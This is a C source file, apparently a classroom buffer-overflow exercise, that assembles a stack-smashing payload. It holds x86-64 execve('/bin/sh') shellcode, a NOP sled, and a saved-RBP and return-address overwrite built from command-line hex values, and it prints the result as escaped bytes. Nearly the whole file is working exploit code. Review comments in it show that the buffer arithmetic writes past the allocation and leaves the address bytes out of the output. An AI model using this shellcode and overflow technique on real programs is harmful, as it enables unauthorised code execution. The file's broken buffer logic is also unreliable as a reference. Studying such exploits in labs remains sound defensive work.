stacksmashexploit.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// Type-punning helper: main() stores an address in llint and then reads it back
// byte-wise through byte[], which yields the 8-byte in-memory representation in the
// host's native byte order. It is mutable file-scope state shared by both uses in main().
union
{
unsigned long long int llint;
unsigned char byte[8];
} longlongintUnion;
//Places the bytes for our raw 64-bit Linux/X86-64 shellcode in memory (will specifically be in the .data section)
//Added nop padding after shellcode
// sizeof(shellcode) is 65: 64 payload bytes plus the implicit NUL terminator. main() uses
// sizeof(shellcode)-1 when placing the next component, so the terminator is overwritten there.
char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x48\xbb\xff\x2f\x62\x69\x6e\x2f" \
"\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48" \
"\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\x48\x89\xd7\xb0" \
"\x3c\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
//manually determined to overflow retptraddr with shellcodeaddr
// sizeof(spacer) is 169: 168 filler bytes (10 lines of 16 plus one of 8) plus the NUL.
// The offsets in main() are derived from these two sizeof values, so editing either
// literal changes the layout of the emitted buffer.
char spacer[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90";
// Entry point. Assembles a byte string in a heap buffer (shellcode, spacer, then two
// 8-byte values taken from argv) and prints each byte of the buffer as a "\xNN" escape
// on stdout. argv[1] and argv[2] are parsed as hexadecimal. Returns EXIT_FAILURE on
// wrong argument count; otherwise falls off the end of main, which C99 treats as return 0.
int main(int argc, char *argv[]) {
char** targv;//array of arguments variable to pass in to real_main(targc,targv) -- NOTE(review): unused in this function
int targc;//number of arguments variable to pass in to real_main(targc,targv) -- NOTE(review): unused in this function
int tstatus;//variable to store the return status from calling real_main(targc,targv) -- NOTE(review): unused in this function
// Both are left uninitialized; they are only assigned by the sscanf calls below, whose
// return values are not checked, so a malformed argument leaves them indeterminate.
unsigned long long int shellcodeaddr;
unsigned long long int oldrbp;
char *taintedbuf;
int taintedbufsize=232;
// NOTE(review): the malloc result is never checked for NULL and the buffer is never
// freed (including on the EXIT_FAILURE path below, where it is allocated before the check).
taintedbuf=malloc(taintedbufsize);
//checks the usage for calling wrapper
if (argc != 3) {
printf("Warning, incorrect args. Usage is $ ./stacksmashexploit <shellcodeAddr> <oldrbp>\n");
return(EXIT_FAILURE);
}
// NOTE(review): a failed conversion (return value != 1) is not detected here.
sscanf(argv[1],"%llx",&shellcodeaddr);
sscanf(argv[2],"%llx",&oldrbp);
// Layout arithmetic (sizeof includes each string's NUL): shellcode occupies [0,65),
// spacer is placed at 64 (overwriting that NUL) and covers [64,233), the two 8-byte
// values go to [232,240) and [240,248).
// NOTE(review): taintedbufsize is 232, so the spacer copy writes one byte past the
// allocation and both memmove calls below write entirely outside it (undefined behavior),
// while the print loop only emits indices [0,232) and never shows those 16 bytes.
// Sizing the buffer from the component sizes rather than a literal would keep the
// writes and the printed output consistent.
memmove(taintedbuf,shellcode,sizeof(shellcode));//copy the shellcode into the taintedbuf
memmove(taintedbuf+sizeof(shellcode)-1,spacer,sizeof(spacer));//copy the spacer into the taintedbuf
// Staging area for one 8-byte value; aligned(8) is a GCC/Clang extension.
char mybuf [8] __attribute__ ((aligned (8)));
//old rbp
// Copy the value byte-by-byte through the union, i.e. in host byte order.
longlongintUnion.llint= oldrbp;
mybuf[0]=longlongintUnion.byte[0];
mybuf[1]=longlongintUnion.byte[1];
mybuf[2]=longlongintUnion.byte[2];
mybuf[3]=longlongintUnion.byte[3];
mybuf[4]=longlongintUnion.byte[4];
mybuf[5]=longlongintUnion.byte[5];
mybuf[6]=longlongintUnion.byte[6];
mybuf[7]=longlongintUnion.byte[7];
memmove(taintedbuf+sizeof(shellcode)+sizeof(spacer)-2,(char*)mybuf, 8);
//ret fptr
// Same byte-wise copy for the second value; placed 8 bytes after the first.
longlongintUnion.llint= shellcodeaddr;
mybuf[0]=longlongintUnion.byte[0];
mybuf[1]=longlongintUnion.byte[1];
mybuf[2]=longlongintUnion.byte[2];
mybuf[3]=longlongintUnion.byte[3];
mybuf[4]=longlongintUnion.byte[4];
mybuf[5]=longlongintUnion.byte[5];
mybuf[6]=longlongintUnion.byte[6];
mybuf[7]=longlongintUnion.byte[7];
memmove(taintedbuf+sizeof(shellcode)+sizeof(spacer)+8-2,(char*)mybuf, 8);
// Emit the first taintedbufsize bytes as "\xNN" escapes; the unsigned char cast keeps
// bytes >= 0x80 from printing as sign-extended values.
for (int i=0;i<taintedbufsize;i++) {
printf("\\x%02x",(unsigned char)taintedbuf[i]);
}
printf("\n");
}